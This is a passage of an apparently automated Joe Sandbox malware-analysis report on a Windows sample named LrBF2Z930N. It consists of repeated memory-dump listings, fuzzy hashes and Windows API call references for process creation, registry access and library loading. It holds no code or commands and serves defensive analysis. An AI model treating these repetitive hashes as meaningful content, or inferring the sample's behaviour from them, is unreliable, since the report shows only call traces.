                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                                      • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                                                      • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                                      • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                                      • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                                                      • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                                      • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                                      • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                                                      • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                                      • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                                      • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                                                      • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                                      • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                                      • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                                                      • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                                      • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                        • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                                                      • SetFilePointer.KERNELBASE(0010A7C7,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer$CountTick
                                                                                      • String ID:
                                                                                      • API String ID: 1092082344-0
                                                                                      • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                                      • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                                                      • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                                      • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                                      • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                                                      • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                                      • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D
                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                                      • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                                                      • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                                      • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                                      • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                                                      • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                                      • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                                      • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                                                      • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                                      • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                                                      APIs
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 2831762973-0
                                                                                      • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                                      • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                                                      • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                                      • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                                      • GetLastError.KERNEL32 ref: 00405C26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                      • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                                                      • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                      • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                      • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3712363035-0
                                                                                      • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                                      • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                                                      • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                                      • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                                        • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                                        • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                                                        • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
